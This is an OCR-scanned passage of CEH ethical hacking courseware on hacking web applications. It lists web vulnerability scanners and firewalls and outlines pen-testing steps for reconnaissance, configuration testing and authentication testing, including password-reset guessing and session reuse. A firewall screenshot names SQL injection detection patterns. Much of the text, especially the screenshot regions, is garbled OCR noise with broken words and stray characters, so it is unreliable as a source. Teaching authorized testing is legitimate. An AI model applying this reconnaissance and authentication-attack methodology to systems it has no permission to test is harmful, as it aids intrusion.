a0pbcat»n T**s 1 lo«c y t i * o*p4rtun*14« K l ‫ ו‬.‫נ‬ L iii
moith t♦‫ •־‬cvr<nt ■Mixyi * x m«r t* tfunfm] Vm
kvoV (4 rtw* 0 M)* b» *‫ ♦י‬wtvi anrt»*yro<t»*m» OWAV a:
♦ ‫■ ^ ר־ז־י־י‬
*
9
Croupbuctb)’
Ml Vjlnt<jb1KvT>o«
ScarandConfarratcnfirntsd J fV
ory:SystemlMoneJ
http://www. mavitunasecurity. com

W e b A p p lic a tio n S e c u rity S c a n n e r: N e ts p a r k e r
" v ‫׳‬ Source: h ttp ://w w w .m a v itu n a s e c u rity .c o m
N e ts p a r k e r® c a n find a n d r e p o r t o n se c u r ity v u ln e ra b ilitie s s u c h as SQL in je c tio n a n d c ro s s-site

s c r i p t i n g (XSS) in all w e b a p p l i c a t i o n s , r e g a r d l e s s o f t h e p l a t f o r m a n d t h e t e c h n o l o g y t h e y a r e
built on. It a l l o w s you to resolve security problem s before th ey 're actually m isused and
c o m p r o m is e d by u n k n o w n atta c k e rs.

W e b A p p lic a t io n S e c u r it y T o o l: N ‫ ־‬S ta lk e r
W e b A p p lic a t io n S e c u r it y S c a n n e r
EH
Ifryfr > 1 » > 1 N‫־‬S:alker Web Application Security Scanner2012 - Free Edition
J N-Stalker Web Application N—' MM -Suia
-S krerSS
ke en
en w‫׳‬
tner Scan Cffcr«i
Security Scanner is an effective 5W rt5can

suite o f w eb security
assessment checks to enhance
the overall security o f web
applications against a wide
range o f vulnerabilities and
sophisticated hacker attacks
J It contains all web security v
assessment checks such a s : rl

e Code injection
mil.(•) M
iJ (P) Low 1)
\l
«MI>
» Cross-Site scripting
e Parameter tampering
« Web server vulnerabilities
I r. -»:«n AtMMffl 0
1 i>
Sw Mjojo , .. a ‫׳‬T»>‫«־‬rh
5'.«U.» 1• S'.atei Sca' -W h brae a
http://nstalker.com
f jH ^ W e b A p p lic a tio n S e c u rity T o o l: N ‫־‬S ta lk e r W e b
_ A p p lic a tio n S e c u rity S c a n n e r
Source: h ttp ://n stalk er.co m
N -Stalker W eb A pplication Security Scanner provides an effective suite of web security

a s s e s s m e n t checks to e n h a n c e th e overall security of y o u r w e b a p p lic a tio n s against a w id e
r a n g e o f v u l n e r a b i l i t i e s a n d s o p h i s t i c a t e d h a c k e r a t t a c k s . It a l s o a l l o w s y o u t o c r e a t e y o u r o w n
a s s e s s m e n t policies a n d r e q u i r e m e n ts , e n a b lin g a n effectiv e w a y to m a n a g e y o u r a p p lic a tio n 's
SDLC, i n c l u d i n g t h e a b i l i t y t o c o n t r o l i n f o r m a t i o n e x p o s u r e , d e v e l o p m e n t f l a w s , i n f r a s t r u c t u r e
i s s u e s , a n d r e a l s e c u r i t y v u l n e r a b i l i t i e s t h a t c a n b e e x p l o r e d b y e x t e r n a l a g e n t s . It c o n t a i n s all
web security assessm ent checks such as code injection, cross-site scripting, p aram eter
ta m p e rin g , w e b s e r v e r vulnerabilities, etc.

W e b A p p lic a t io n S e c u r it y T o o l:
V a m p ir e S c a n
EH
V am p ireS can a llo w s users to te s t th e ir o w n C loud and

V am pireScan W eb a p p lic a tio n s fo r basic a tta c k s and receive
L a c tio n a b le re sults all w ith in th e ir o w n W eb p o rta l
F eatu res
e P ro te c t y o u r w e b s ite fro m
hackers
e Scan and p r o te c t y o u r
in fra s tru c tu re a n d w e b
a p p lic a tio n s f r o m c y b e r-
th re a ts
© G ive y o u d ire c t,
a c tio n a b le in s ig h t o n
high, m e d iu m , a n d lo w
risk v u ln e ra b ilitie s
http://www.vampiretech.com
^ W e b A p p lic a tio n S e c u rity T o o l: N -S ta lk e r W e b
0 , . A p p lic a tio n S e c u rity S c a n n e r
Source: h ttp ://w w w .v a m p ire te c h .c o m
V a m p ire S c a n allow s u sers to te s t th e ir o w n Cloud a n d W e b ap p licatio n s for basic atta c k s

a n d r e c e i v e a c t i o n a b l e r e s u l t s all w i t h i n t h e i r o w n W e b p o r t a l . It c a n p r o t e c t y o u r w e b s i t e
f r o m h a c k e rs . This tol c a n s c a n a n d p r o t e c t y o u r in f r a s tr u c tu r e a n d w e b a p p lic a tio n s f r o m
c y b e r - t h r e a t s a n d c a n a l s o g i v e y o u d i r e c t , a c t i o n a b l e i n s i g h t o n h i g h , m e d i u m , a n d l o w risk
vulnerabilities

W eb A p p lic a tio n S ecurity Tools C E H
IH L T S a n d c a tM in i W e b s e c u rify
h ttp ://w w w .s y h u n t.c o m h t t p : / / w w w . w e b s e c u r ify . c o m
O W A S P ZAP N e tB r u te
h t tp : //w w w . ow a sp. o rg h t t p : / / w w w . r a w lo g ic . c o m
s k ip fis h W—hi X5s

| ^___ j h t t p : / / c o d e . g o o g le . c o m h t t p : / / w w w .cas ab a. c o m
W SS A - W e b S ite S e c u r ity
S e c u B a t V u ln e r a b ility S c a n n e r
h t t p : / / s e c u b a t . c o d e p ie x . c o m
f t . S c a n n in g S e rvice
' h t t p s : / / s e c u r e . b e y o n d s e c u r it y . c o m
SPIKE P ro x y R a tp ro x y
h t t p : / / w w w . im m u n it y s e c . c o m h t t p : / / c o d e , g o o g le , c o m
Copyright© by EC-Cauncil. All Rights Reserved. Reproduction isStrictly Prohibited.
W e b A p p lic a tio n S e c u rity T o o ls
W eb application security tools are web application security assessm ent softw are
designed to thoroughly analyze tod ay's com plex web applications w ith the aim of finding
e x p l o i t a b l e S Q L i n j e c t i o n , XSS v u l n e r a b i l i t i e s , e t c . T h e s e t o o l s d e l i v e r s c a n n i n g c a p a b i l i t i e s ,
b ro a d a s s e s s m e n t c o v e ra g e , a n d a c c u r a te w e b app licatio n sc a n n in g results. C o m m o n ly u se d
w e b a p p lic a tio n se c u r ity to o ls a r e listed as follow s:
Q S an d catM in i available at h tt p :/ /w w w .s y h u n t.c o m
0 O W A S P ZAP a v a i l a b l e a t h t t p : / / w w w . o w a s p . o r g
6 skipfish a v a ilab le a t h t t p : / / c o d e . g o o g l e . c o m
Q S ecu B at V ulnerability S c a n n e r available a t h t t p :/ /s e c u b a t.c o d e p l e x .c o m
© SPIKE P r o x y a v a i l a b l e a t h t t p : / / w w w . i m m u n i t v s e c . c o m
0 W e b se c u rify available a t h ttp ://w w w .w e b s e c u r if y .c o m
© N etB ru te available at h ttp ://w w w .ra w lo g ic .c o m
Q X5s a v a ila b le a t h t t p : / / w w w . c a s a b a . c o m
© W SSA ‫ ־‬W e b Site S e c u rity S c a n n in g Service a v a ilab le at
https://secure.bevondsecuritv.com

W eb A p p lic a tio n S ecurity Tools C E H

( C o n t ’d )
W a p iti i p i S y h u n t H y b rid
h t t p : / / w a p i t i , s o u r c e fo r g e , n e t h ttp ://w w w .s y h u n t.com
W e b W a tc h B o t E x p lo it- M e
h t t p : / / w w w . e x c la m a tio n s o f t . c o m
1
M h t t p : / '/ l a b s , s e c u r it y c o m p a s s .c o m
Kf -r ! \ KeepN I
h t t p : / / w w w . k e e p n i. c o m
(P " W S D ig g e r
h t t p : / / w w w . m c a fe e . c o m
G ra b b e r A ra c h n i
h t t p : / / r g a u c h e r . in fo □ □ ‫ם‬ h t t p : / / a r a c h n i- s c a n n e r . c o m
xsss Vega
h t tp : //w w w .s ven. de - ‫ח ד‬ h t t p : / / w w w .s u b g ra p h . c o m
W e b A p p lic a tio n S e c u rity T o o l s ( C o n t ’d )
In a d d i t i o n t o t h e p r e v i o u s l y m e n t i o n e d w e b a p p l i c a t i o n s e c u r i t y t o o l s , t h e r e a r e f e w
m o r e tools th a t can be u sed to assess th e security of w e b applications:
© W apiti available a t h ttp ://w a p iti.s o u r c e fo rg e .n e t
© W e b W a t c h B o t available at h ttp ://w w w .e x c la m a tio n s o f t.c o m
© KeepNI available a t h tt p :/ /w w w .k e e p n i.c o m
© G ra b b e r available a t h ttp ://r g a u c h e r.in f o
© XSSS a v a i l a b l e a t h t t p : / / w w w . s v e n . d e
© S v h u n t Hybrid av a ila b le a t h t t p : / / w w w . s v h u n t . c o m
© E xploit-M e available a t h ttp ://la b s .s e c u r ity c o m p a s s .c o m
© W SD igger available at h tt p :/ /w w w .m c a f e e .c o m
© Arachni available at h ttp ://a r a c h n i-s c a n n e r.c o m
© V ega available at h tt p :/ /w w w .s u b g r a p h .c o m

Ethical Hacking and Countermeasures Exam 312-50 C ertified Ethical Hacker
W eb A p p lic a tio n F ire w a ll:

C E H
d otD efen der Urt1fw4 ilhiul lUtbM
d o tD e fe n d e r is a s o ftw a r e
AM
e *‫ י׳מיי‬vew *ovomrs .»‫ »«*׳‬hc*<
based W e b A p p lic a tio n cbtOefrndEr(329 daysfcft)
F ire w a ll
il U EventView?(Locrf)
_tl‫ו׳וי‬InternetIrrfonriaaarSer*
d tDefender
4> Gbbal Settngs
I t c o m p le m e n ts th e □ {2) DeâiJt Scanty FtoSe p-otec
n e t w o r k f ir e w a ll, IPS and
Server Ma*ng
[£ Lpka: Fok:»5‫־‬
i 9 SQL
‫ ־‬Infection
0 £ ‫ כ‬Patterns awM* ypev. sol r t- « «
o th e r n e tw o rk -b a s e d ffl fel WhalBt (Perm!*d As
ij £2) Pararoc
In te r n e t s e c u rity p ro d u c ts ij fgtEncotlnQ w Suspect Single Quote (Safe)
[fl BjffwOi'eHbn □
a £21SQLlr!j*ct>cr
I t in s p e c ts th e HTTP/HTTPS Lae‫ ׳‬cHhed
‫ מ‬Pattern = Pattern □
t r a f fic f o r su sp icio u s CB .71‫ ־‬CT0B-5WSowanc
b e h a v io r CU c7t *,‫י^ג‬
Classic SQL Comment ‫’־־‬ D
‫ש‬ c7(•‫י־*יי‬5
I t d e te c ts a n d b lo c k s SQL Ltl uJ)
R«no(e ca‫< ״‬m#nfl l*e
Q) Ced* mrrten( )!
w SQL Comments Q
in je c tio n a tta c k s m & vmdow* :»rrner*!‫־‬ar 1

HJ ^ W*l Vtwna Q ‘Union Select’ Statement
ID
U
^2) lnty*rran
»*a!h
U‫ן‬a ( ‫«ימ‬9‫ י‬creataw‫־‬..‫־‬rf*e
‫ם‬
U
flj*e]<:*•<‫<ז‬ W ‘Select Version' Statement Q
. ‫ ן‬Afttna FTP ‫ *זיל‬:Jw LVaUi:
P SQL CHAR Type ‫ם‬
W SQL SYS Commands □
W IS SRVROLEMEMBER followed by ( ‫ם‬
‫ ק‬MS SQL Specific SQL Injection
http://www. opplicure.com
55^ W e b A p p lic a tio n F ire w a ll: d o tD e f e n d e r
Source: h ttp ://w w w .a p p lic u re .c o m
dotD efender™ is a s o f t w a r e - b a s e d w e b a p p l i c a t i o n f i r e w a l l t h a t p r o v i d e s a d d i t i o n a l w e b s i t e
security against malicious attacks and w ebsite defacem ent. It p r o t e c t s your w ebsite from
m alicious attacks. W eb application attacks such as SQL in je c tio n , path traversal, cross-site
scripting, a n d o t h e r a tta c k s leading to w e b s ite d e f a c e m e n t can b e p r e v e n t e d w ith d o tD e f e n d e r .
It c o m p l e m e n t s t h e n e t w o r k f i r e w a l l , IPS, a n d o t h e r n e t w o r k - b a s e d I n t e r n e t s e c u r i t y p r o d u c t s .
It i n s p e c t s H T T P / H T T P S t r a f f i c f o r s u s p i c i o u s b e h a v i o r .
M o d u le 13 Page 1953 Ethical H acking a n d C o u n te rm e a s u re s Copyright © by EC-C0UnCil

All Rights Reserved. Reproduction is S trictly Prohibited.
Hacking W eb A pplications
W eb A p p lic a tio n F ire w a ll:

c EH
S erverD efend er VP (•rtifwd ItkMJl lUckM
S erve rD efen der VP W eb a p p lic a tio n fire w a ll is d e sig ned to p ro v id e s e c u rity a g ainst w e b a tta cks
SefverDefender VP Settings Manager
p o r t8 0
l-ojt <'adaton Buffer Overflow | Resources | Me*cds JU3 | RieUpfea-s | Ectpmts

Common■p>r«3ts
SQL Injection
&Z|aoACfttJ«9teStTplng(>SS) M l_______ v_
ribicdKTW
Gcnenc ]‫׳‬ru t wrrtiratwn
OiNone
$l**Mun 0‫ ^נ‬. II. 12, H 31, 127, 175-223, 25$)
C) Extended (>, <,', ‫ ♦ ו‬Mnmum
1
OPwanad (L *. M . ,] *M a d id
http://www.port80software.com
W e b A p p lic a tio n F ir e w a ll: S e r v e r D e f e n d e r V P
§Q i Source: h ttp ://w w w .p o rt8 0 s o ftw a re .c o m
T h e S e r v e r D e f e n d e r V P w e b a p p l i c a t i o n f i r e w a l l is d e s i g n e d t o p r o v i d e s e c u r i t y a g a i n s t w e b
attacks. SDVP security wi l l prevent data theft and breaches and stop unauthorized site
d e f a c e m e n t , file a l t e r a t i o n s , a n d d e l e t i o n s .
M odule 13 P ag e 1955 Ethical Hacking and C ounterm easures C opyright © by EC-C0UnCil

B a rra c u d a W e b A p p lic a tio n

R a d w a re 's A p p W a ll
‫□ו‬ h t t p : / / w w w .ra d w a re . co m
F ire w a ll
h t t p s : / / w w w . b a r r a c u d a n e tw o r k s . c o m
nss^l T h r e a tS e n tr y I3H l S tin g ra y A p p lic a tio n F ire w a ll

1— j h t t p : / / w w w . p r iv a c y w a r e , c o m h t t p : / / w w w . r iv e r b e d , c o m
r - ‫' י־־‬
W
Q u a ly s G u a rd W AF IB M S e c u r ity A p p S c a n
h t t p : / / w w w . q u a ty s . c o m h t t p : / / w w w -0 1 . ib m . c o m
T h re a tR a d a r T r u s tw a v e W e b D e fe n d
h t t p : / / w w w . im p e r v a . c o m h t t p s : / / w w w . tr u s t w a v e , c o m
■ ‫יו‬ — 1 M o d S e c u r ity B! C y b e r o a m 's W e b A p p lic a tio n

F ire w a ll
J J h t t p : / / w w w . m o d s e c u r ity . o r g
h t t p : / / w w w .c y b e ro a m , com
‫ץ‬ W e b A p p lic a tio n F ir e w a lls
y W e b application firewalls s e c u r e w e b site s, w e b applications, a n d w e b services ag ain st

k n o w n an d u n k n o w n attacks. T hey p re v e n t d a ta th e ft an d m an ip u latio n of sensitive c o rp o ra te
a n d c u s t o m e r in f o r m a tio n . C o m m o n l y u s e d w e b a p p lic a tio n firew alls a r e listed as follow s:
© R a d w a re 's A ppW all available a t h tt p : / / w w w .r a d w a r e .c o m
© T h re a tS e n try available at h ttp ://w w w .p r iv a c y w a r e .c o m
© Q u aly sG u ard WAF available a t h ttp ://w w w .q u a ly s .c o m
© T h re a tR a d a r available a t h tt p :/ /w w w .im p e r v a .c o m
© M o d S ecu rity available at h ttp ://w w w .m o d s e c u r ity .o r g
© B a r r a c u d a W e b A p p lic a tio n Firewall av ailab le a t h t t p s : / / w w w . b a r r a c u d a n e t w o r k s . c o m
© S tin g ra y A p p lic a tio n Firewall a v a ila b le a t h ttp ://w w w .riv e rb e d .c o m
© IBM S e c u r i t y A p p S c a n a v a i l a b l e a t h t t p : / / w w w - 0 1 . i b m . c o m
© T ru stw a v e W e b D e f e n d available a t h ttp s : // w w w .tr u s t w a v e .c o m
© C y b e r o a m 's W e b A p p licatio n Firewall a v a ilab le a t h t t p : / / w w w . c y b e r o a m . c o m

M o d u l e F lo w C E H
W eb A pp C oncepts
fa
* Q Q Q
S e c u rity Tools W eb A pp Threats
**S C ounterm easures
As m e n t i o n e d p r e v i o u s l y , w e b a p p l i c a t i o n s a r e m o r e v u l n e r a b l e t o a t t a c k s . A t t a c k e r s
use w eb applications as th e sources for spreading attacks by tu rn in g t h e m into m alicious
applications once com prom ised. Your w e b application may also become a victim of such
a t t a c k s . T h e r e f o r e , t o a v o i d t h i s s i t u a t i o n , y o u s h o u l d c o n d u c t p e n e t r a t i o n t e s t i n g in o r d e r t o
d e t e r m i n e t h e vulnerabilities b e fo r e th e y a re ex p lo ited by real a ttack ers.
W e b A pp Pen T esting W e b A pp C oncepts
m S ecurity Tools W eb App T hreats
lM C ounterm easures ^ H acking M e th o d o lo g y

* f f £ 3 ‫׳‬
W e b A pplication H acking Tools

Ethical Hacking and Countermeasures Exam 312-50 C ertified Ethical Hacker
W eb A p p lic a tio n P en T e s tin g C EH

UrtrfW* itfciul Nm Im
J W eb a p p lica tio n pen te s tin g is used to id e n tify , a na lyze , and r e p o r t v u ln e r a b ilitie s such as in p u t va lid a tio n ,
b u ffe r o v e rflo w , SQL in je c tio n , b ypassing a u th e n tic a tio n , code execution, etc. in a g iven a p p lica tio n
J The b est w a y to p e rfo rm p e n e tra tio n te s tin g is to c o n d u c t a s e rie s o f m e th o d ic a l and re p e a ta b le te s ts , and

to w o rk th ro u g h all o f th e d iffe re n t a p p lic a tio n v u ln e ra b ilitie s
□j
p -----------
1 http.‫׳‬/
sm m
!
R e m e d ia tio n o f V u ln e ra b ilitie s
Id e n tific a tio n o f P orts
Scan th e ports to id e n tify the associated running

services and analyze them through a utom ated
o r manual tests to fin d weaknesses
V e rific a tio n o f V u ln e ra b ilitie s

To retest the solution against
To e xplo it the vu ln e ra bility in o rder
vuln e ra bility to ensure th a t it is
to te s t and fix the issue
com ple te ly secure
|p ‫ך‬ ] W e b A p p lic a tio n P e n T e s tin g
1 ur W eb application pen testing is d o n e to d e te c t various security vulnerabilities a n d

a s s o c i a t e d risks. As a p e n t e s t e r , y o u s h o u l d t e s t y o u r w e b a p p l i c a t i o n f o r v u l n e r a b i l i t i e s s u c h a s
i n p u t v a l i d a t i o n , b u f f e r o v e r f l o w , SQL in j e c ti o n , b y p a s s i n g a u t h e n t i c a t i o n , c o d e e x e c u t i o n , e t c .
T h e b e s t w a y t o c a r r y o u t a p e n e t r a t i o n t e s t is t o c o n d u c t a s e r i e s o f m e t h o d i c a l a n d r e p e a t a b l e
t e s t s , a n d t o w o r k t h r o u g h all o f t h e d i f f e r e n t a p p l i c a t i o n v u l n e r a b i l i t i e s .
W e b a p p l i c a t i o n p e n t e s t i n g h e l p s in:
© Id en tificatio n o f P o rts: Scan t h e p o rts to identify t h e a ss o c ia te d ru n n in g services a n d

a n a ly z e t h e m t h r o u g h a u t o m a t e d o r m a n u a l te s ts t o find w e a k n e s s e s .
0 V e r i f i c a t i o n o f V u l n e r a b i l i t i e s : T o e x p l o i t t h e v u l n e r a b i l i t y in o r d e r t o t e s t a n d f i x t h e
issue.
© R e m e d ia tio n of V ulnerabilities: To re te st th e solution against vulnerability to e n su r e

t h a t it is c o m p l e t e l y s e c u r e .
M o d u le 13 Page 1960 Ethical H acking a n d C o u n te rm e a s u re s Copyright © by EC-C0UnCil

All Rights Reserved. Reproduction is S trictly Prohibited.
_ _
W e b A p p lic a t io n P e n T e s t in g
C E H
( C o n t ’d )
START
In fo rm a tio n A u th o r iz a tio n W e b S ervices

G a th e rin g Te stin g Testing
------------------- * ---------------------
v
C o n fig u ra tio n B usiness Logic

AJAX Testing
M a n a g e m e n t Testing Testing
------------------- * ---------------------
9 --------------------- ■--------------------- V
A u th e n tic a tio n D ata V a lid a tio n

Testing Testing
------------------- * ---------------------
V
Session D e n ia l-o f-S e rv ic e

M a n a g e m e n t Testing Testing
W e b A p p lic a tio n P e n T e s tin g ( C o n t ’d )
T he g e n e ra l s te p s t h a t yo u n e e d to follow to c o n d u c t w e b a p p lic a tio n p e n e tr a ti o n

t e s t a r e l i s t e d a s f o l l o w s . In a f u t u r e s e c t i o n , e a c h s t e p is e x p l a i n e d in d e t a i l .
S t e p 1: D e f i n i n g o b j e c t i v e
Y o u s h o u l d d e f i n e t h e a i m o f t h e p e n e t r a t i o n t e s t b e f o r e c o n d u c t i n g it. T h i s w o u l d h e l p y o u t o
m o v e in r i g h t d i r e c t i o n t o w a r d s y o u r a i m o f p e n e t r a t i o n t e s t .
S t e p 2: I n f o r m a t i o n g a t h e r i n g
You sh o u ld g a t h e r as m u c h in f o r m a tio n as p o ssib le a b o u t y o u r t a r g e t s y s te m o r n e tw o r k .
S t e p 3: C o n f i g u r a t i o n m a n a g e m e n t t e s t i n g
M ost w e b application attacks occur b e c a u se of im p ro p e r configuration. T h erefore, you should

conduct configuration m a n a g e m e n t testing. This also helps you to protect against known
v u ln e ra b ilitie s by installing t h e la te s t u p d a te s .
S te p 4: A u t h e n t i c a t i o n t e s ti n g s e s s io n
Test th e au th en ticatio n session to u n d e rs ta n d th e a u th e n tic a tio n m e c h a n is m an d to d e te rm in e

t h e p o s s i b l e e x p l o i t s in it.

I n f o r m a t io n G a t h e r in g C E H
START e R etrieve and analyze ro b o ts .tx t file

© using to o ls such as GNU W g e t
Allowed and disallowed
e Use th e advanced " s ite :" search
directories
o p e ra to r and th e n click "C ached"
t o p e rfo rm search engine
V
reconnaissance
Issues of web application
P e rfo rm search engine
‫►״‬ structure, error pages e
reconnaissance Id e n tify app lic a tio n e n try p o in ts
produced
using to o ls such as W ebscarab,
B u rp proxy, OWASP ZAP, Tam perlE
Cookie inform ation, 300 (fo r In te rn e t Explorer), o r Tam per

Id e n tify app lic a tio n Data (fo r Firefox)
‫■>• ׳‬ HTTP and 400 status codes,
e n tr y p o in ts 500 internal server errors
To id e n tify w e b ap p lic a tio n s : probe
fo r URLs, do d ic tio n a ry -s ty le
searching (in te llig e n t guessing)
Id e n tify th e w e b Web applications, old and p e rfo rm v u ln e ra b ility scanning
app lic a tio n s versions of file s o r artifacts
using to o ls such as N m ap (Port
Scanner) and Nessus
Analyze th e O /P fro m Web server software Im p le m e n t techniques such as

HEAD and OPTIONS version, scripting DNS zone tran sfers, DNS inverse
h ttp re q u e s ts environment, and OS in use queries, w eb-based DNS searches,
V qu e ry in g search engines (googling)
I n f o r m a tio n G a th e r in g
Let's g e t in to detail a n d d is c u ss e a c h w e b a p p lic a tio n t e s t s t e p t h o r o u g h ly .
The first step in w e b application pen testing is i n f o r m a t i o n gathering. To gather all t h e

in fo rm atio n a b o u t t h e ta r g e t application, follow t h e s e steps:
S t e p 1: A n a l y z e t h e r o b o t s . t x t f i l e
R o b o t . t x t is a f i l e t h a t i n s t r u c t s w e b r o b o t s a b o u t t h e w e b s i t e s u c h a s d i r e c t o r i e s t h a t c a n b e
allow ed a n d disallow ed to th e user. H ence, analyze th e ro b o t.tx t an d d e te r m in e th e allow ed
a n d d i s a l l o w e d d i r e c t o r i e s o f a w e b a p p l i c a t i o n . Y ou c a n r e t r i e v e a n d a n a l y z e r o b o t s . t x t file
using tools such as GNU W get.
S t e p 2: P e r f o r m s e a r c h e n g i n e r e c o n n a i s s a n c e
Use th e advanced "site:" s e a r c h operator and then click C a c h e d t o perform search engine
r e c o n n a i s s a n c e . It g i v e s y o u i n f o r m a t i o n s u c h a s i s s u e s o f w e b a p p l i c a t i o n s t r u c t u r e a n d e r r o r
pages produced.

I n f o r m a t io n G a t h e r in g r g u
( C o n t ’d ) (•lllfwtf | ltkl«4l NMhM
y 8 Analyze e rro r codes by re q u e s tin g invalid

pages and u tiliz e a lte rn a te re q u e s t
m e th o d s (PO ST/PUT/O ther) in o rd e r t o
Software versions, details
A n a ly s is o f e r ro r collect c o n fid e n tia l in fo rm a tio n fro m th e
....... of databases, bugs, and
codes technological components server
© Examine th e source code fro m th e

accessible pages o f th e a p p lic a tio n fro n t-
>f end
Test f o r re c o g n iz e d file
Web application e Test fo r recognized file
ty p e s /e x te n s io n s / environment ty p e s /e x te n s io n s /d ire c to rie s by requestin g
d ire c to rie s c o m m o n file extensions such as .ASP, .HTM ,
.PHP, .EXE, and w a tc h fo r any unusual
o u tp u t o r e rro r codes
>f
P erform TCP/ICMP and service
E x a m in e s o u rc e o f Provide dues as to the fin g e rp rin tin g using tra d itio n a l
........ underlying application fin g e rp rin tin g to o ls such as N m ap and
a v a ila b le pag es
environment
Q ueso, o r th e m o re recent app lic a tio n
fin g e rp rin tin g to o l A m ap
>/
T C P /IC M P a n d s e rv ic e Web application services

fin g e r p r in tin g and associated ports
I n f o r m a tio n G a th e r in g ( C o n t ’d )
S t e p 6: A n a l y z e e r r o r c o d e s
Analyze error codes by requesting invalid pages and utilize alternate request m ethods
( P O S T / P U T / O t h e r ) in o r d e r t o c o l l e c t c o n f i d e n t i a l i n f o r m a t i o n f r o m t h e s e r v e r . T h i s m a y r e v e a l
inform ation such as softw are versions, details of databases, bugs, and technological
com ponents.
S t e p 7: T e s t f o r r e c o g n i z e d file t y p e s / e x t e n s i o n s / d i r e c t o r i e s
T e s t f o r r e c o g n i z e d file t y p e s / e x t e n s i o n s / d i r e c t o r i e s b y r e q u e s t i n g c o m m o n file e x t e n s i o n s s u c h
a s . AS P, . H T M , . P H P , .EXE, a n d o b s e r v e t h e r e s p o n s e . T h i s m a y g i v e y o u a n i d e a a b o u t t h e w e b
application en v iro n m en t.
S t e p 8: E x a m i n e s o u r c e o f a v a i l a b l e p a g e s
E x a m in e t h e s o u r c e c o d e f r o m t h e a c c e s s ib le p a g e s o f t h e a p p lic a tio n f r o n t- e n d . This p ro v id e s

clues a b o u t th e underlying application e n v iro n m e n t.
S t e p 9: T C P /I C M P a n d s e r v ic e f i n g e r p r i n t i n g
Perform TCP/ICM P a n d service fingerprinting using tra d itio n a l fin g erp rin tin g to o ls such as
N m ap and Queso, or the m o r e r e c e n t a p p lic a tio n fin g e rp rin tin g to o ls A m a p . This gives y o u
in fo rm atio n a b o u t w e b application services a n d asso ciate d ports.

r C o n fig u ratio n M a n a g e m e n t
Testing
Disclosure o f c o n fid e n tia l

in fo rm a tio n
‫מ‬
START
&
c EH
tertMM
w Identify the ports associated to SSL/TLS wrapped services using Nmap

and Nessus
» Perform network scanning and analyze the web server banner
IU mjI Km Im
e Test the application configuration management using CGI scanners and

V reviewing the contents of the web server, application server, comments,
configuration and logs
P e rfo rm in fra s tru c tu re
Source code o f th e
c o n fig u ra tio n m anage m ent » Use vulnerability scanners, spidering and mirroring tools, searchengines
a p p lic a tio n queries or perform manual inspection to test for file extensions handling
te s tin g
t» Review source code, enumerate application pages and functionality
& Perform directory and file enumeration, reviewing server and application
In fo rm a tio n in th e source documentation, etc. to test for infrastructure and application admin
P e rfo rm a p p lic a tio n
interfaces
code, log files, and d e fa u lt <■ c o n fig u ra tio n m a n a g e m e n t
e rro r codes te s tin g » Review OPTIONS HTTP method using Netcat or Telnet
C o n fid e n tia l in fo rm a tio n Test fo r file exte n s io n s Test fo r HTTP m e th o d s C redentials o f

..... >
a b o u t access c redentials handling and XST le g itim a te users
Source code, in s ta lla tio n V e rify th e presence o f old , Test fo r in fra s tru c tu re A d m in interfaces can be
paths, passw ords fo r backup, and u n re fe re n c e d and a p p lic a tio n adm in fo u n d t o gain access to
app lica tio n s, and databases file s in te rfa c e s adm in fu n c tio n a lity
C o n f ig u r a tio n M a n a g e m e n t T e s tin g
f ^ \
Once you gather inform ation about the web application environm ent, test the
configuration m anagem ent. It is i m p o r t a n t t o test th e configuration m anagem ent because
im p r o p e r c o n fig u ratio n m a y allow u n a u t h o r i z e d u s e r s to b re a k into t h e w e b application.
S t e p l : P e r f o r m SSL/TLS t e s t i n g
S S L / TL S t e s t i n g a l l o w s y o u t o i d e n t i f y t h e p o r t s a s s o c i a t e d w i t h S S L / T L S w r a p p e d s e r v i c e s . Y o u
c a n d o th is w ith t h e h e lp o f to o ls s u c h a s N m a p a n d N e ssu s. This h e lp s d is clo se c o n fid e n tia l
inform ation.
S t e p 2: P e r f o r m i n f r a s t r u c t u r e c o n f i g u r a t i o n m a n a g e m e n t t e s t i n g
P erfo rm n e tw o rk scanning an d analyze w e b serv er b a n n e rs to analyze th e so u rc e c o d e of th e

application.
S t e p 3: P e r f o r m a p p l i c a t i o n c o n f i g u r a t i o n m a n a g e m e n t t e s t i n g
Test th e configuration m a n a g e m e n t of infrastructure u s i n g CGI s c a n n e r s a n d review ing th e

c o n t e n t s o f t h e w e b s e r v e r , a p p l i c a t i o n s e r v e r , c o m m e n t s , c o n f i g u r a t i o n , a n d logs. T his g iv e s
y o u i n f o r m a t i o n a b o u t t h e s o u r c e c o d e , log files, a n d d e f a u l t e r r o r c o d e s .

A u t h e n t ic a t io n T e s t in g C E H
START © T ry to re s e t p a s s w o rd s b y g u e ssin g , so cial

e n g in e e rin g , o r cra ckin g s e c re t q u e s tio n s , if
used. C heck i f " r e m e m b e r m y p a s s w o rd "
m e c h a n is m is im p le m e n te d b y ch eckin g th e
HTM L code o f th e lo g in page.
© C heck i f i t is p o ssib le to "r e u s e " a session

a ft e r lo g o u t. A ls o ch e ck if th e a p p lic a tio n
Test f o r lo g o u t a n d a u to m a tic a lly lo g s o u t a u se r w h e n th a t user
A u th e n tic a tio n
b ro w s e r c a c h e has b een id le fo r a c e rta in a m o u n t o f tim e ,
v u ln e ra b ilitie s
m anagem ent and th a t no s e n s itiv e d ata re m a in s s to re d in
th e b ro w s e r cache.
V ® Id e n tify a ll p ara m e te rs th a t are s e n t in
a d d itio n to th e d e c o d e d CAPTCHA v a lu e fro m
A u th e n tic a tio n
Test f o r CAPTCHA th e c lie n t to th e se rve r and try to send an o ld
d e c o d e d CAPTCHA v a lu e w it h an o ld
CAPTCHA ID o f an o ld session ID
W C heck if users h o ld a h a rd w a re d evice o f som e

M u ltip le fa c to r s kin d In a d d itio n to th e passw o rd . C heck if
Test f o r m u ltip le
h a r d w a re d e v ic e c o m m u n ic a te s d ire c tly a n d
a u th e n tic a tio n
fa c to r s a u th e n tic a tio n in d e p e n d e n tly w ith th e a u th e n tic a tio n
in fra s tru c tu re u sing an a d d itio n a l
c o m m u n ic a tio n ch an ne l.
® A tt e m p t t o fo r c e a ra ce c o n d itio n , m ake
Test f o r race m u ltip le sim u lta n e o u s re q ue sts w h ile
Race c o n d itio n s
c o n d itio n s o b se rvin g th e o u tco m e f o r u ne xp e cte d
b e h a vio r. P erfo rm co de re vie w .
Hj j j j g A u th e n tic a tio n T e s tin g
You n e e d t o p e r f o r m t h e fo llow ing s t e p s to carry o u t a u t h e n t i c a t i o n testin g :
S t e p 1: T e s t f o r V u l n e r a b l e R e m e m b e r p a s s w o r d a n d p w d r e s e t
T e st fo r V u ln e ra b le R e m e m b e r p a s s w o r d a n d p w d r e s e t by a t t e m p t i n g t o r e s e t p a s s w o r d s by
